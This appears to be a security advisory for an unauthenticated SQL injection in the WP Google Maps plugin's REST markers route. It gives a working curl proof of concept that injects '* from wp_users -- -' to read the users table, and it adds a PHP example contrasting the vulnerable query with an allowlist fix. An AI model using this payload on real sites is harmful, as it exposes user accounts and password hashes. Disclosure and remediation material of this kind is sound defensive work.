The REST API handler in includes/class.rest-api.php (WP Google Maps before 7.11.18) does not sanitize the column names supplied in the `fields` request parameter before concatenating them into the SELECT list of a query. Because the `/wpgmza/v1/markers/` route is reachable without authentication, this is an unauthenticated SQL injection: an attacker can replace the field list with `* from wp_users -- -`, which selects every column of the users table and comments out the rest of the intended statement.
Proof of concept (the quoted-printable encoding of the original line has been decoded):

curl -k --silent "http://example.com/index.php?rest_route=/wpgmza/v1/markers/&filter={}&fields=*+from+wp_users+--+-"
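The following is an added illustration, not code from the plugin or the advisory, of the query-building pattern the advisory describes and of the allowlist fix a maintainer would apply. The function names, the `wp_wpgmza` table name and the column allowlist are assumptions chosen for the example; no database connection is made, the code only shows the SQL text each version would send.

```php
<?php
// Added example (not the plugin's own code). Models the vulnerable pattern
// described in the advisory and a hardened replacement. The function names,
// the table name and the column allowlist are assumptions for illustration.

const MARKER_TABLE = 'wp_wpgmza'; // assumed marker table name

// Vulnerable pattern: the request's `fields` value goes straight into the
// SELECT list. A value such as "* from wp_users -- -" turns the statement
// into a SELECT over wp_users; the "-- " sequence starts a MySQL comment
// that swallows the FROM clause the handler appends afterwards.
function build_markers_query_vulnerable(array $request): string
{
    $fields = $request['fields'] ?? '*';
    return "SELECT {$fields} FROM " . MARKER_TABLE;
}

// Hardened pattern: split the requested list, accept only names from an
// allowlist of real marker columns and quote each one as an identifier.
// Anything else raises an error before any SQL is built.
function build_markers_query_hardened(array $request): string
{
    static $allowed = ['id', 'lat', 'lng', 'address', 'title', 'description'];

    $raw = $request['fields'] ?? '*';
    if ($raw === '*') {
        return 'SELECT * FROM `' . MARKER_TABLE . '`';
    }

    $cols = [];
    foreach (explode(',', $raw) as $field) {
        $field = trim($field);
        if (!in_array($field, $allowed, true)) {
            throw new InvalidArgumentException("Invalid field name: {$field}");
        }
        $cols[] = '`' . $field . '`';
    }
    return 'SELECT ' . implode(', ', $cols) . ' FROM `' . MARKER_TABLE . '`';
}

// Constructed inputs: the advisory's PoC parameters after URL decoding
// ('+' becomes a space), and a benign request for comparison.
$attack = ['filter' => '{}', 'fields' => '* from wp_users -- -'];
$benign = ['fields' => 'id,lat,lng'];

echo "vulnerable, attacker input: ", build_markers_query_vulnerable($attack), PHP_EOL;
echo "hardened, benign input:     ", build_markers_query_hardened($benign), PHP_EOL;
try {
    build_markers_query_hardened($attack);
} catch (InvalidArgumentException $e) {
    echo "hardened, attacker input:   rejected (", $e->getMessage(), ")", PHP_EOL;
}
```

Run it with `php example.php`. The point of the hardened version is that identifiers cannot be bound as prepared-statement parameters, so the only safe way to let a client choose columns is to compare the request against a fixed list of known column names and quote the survivors; escaping functions meant for string values do not help with names in a SELECT list.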
| CPE | Name | Operator | Version |
|---|---|---|---|
| | wp-google-maps | lt | 7.11.18 |